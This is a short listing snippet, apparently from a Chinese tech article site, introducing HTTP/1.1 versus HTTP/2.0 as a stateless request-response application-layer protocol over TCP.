  • http1.1與http2.0

    一、http是什么 通俗來講,http就是計算機通過網路進行通信的規則,是一個基于請求與回應,無狀態的,應用層協議。常用于TCP/IP協議傳輸資料。目前任何終端之間任何一種通信方式都必須按Http協議進行,否則無法連接。tcp(三次握手,四次揮手)。 請求與回應:客戶端請求、服務端回應資料。 無狀態 ......

    uj5u.com 2023-04-20 08:00:32 more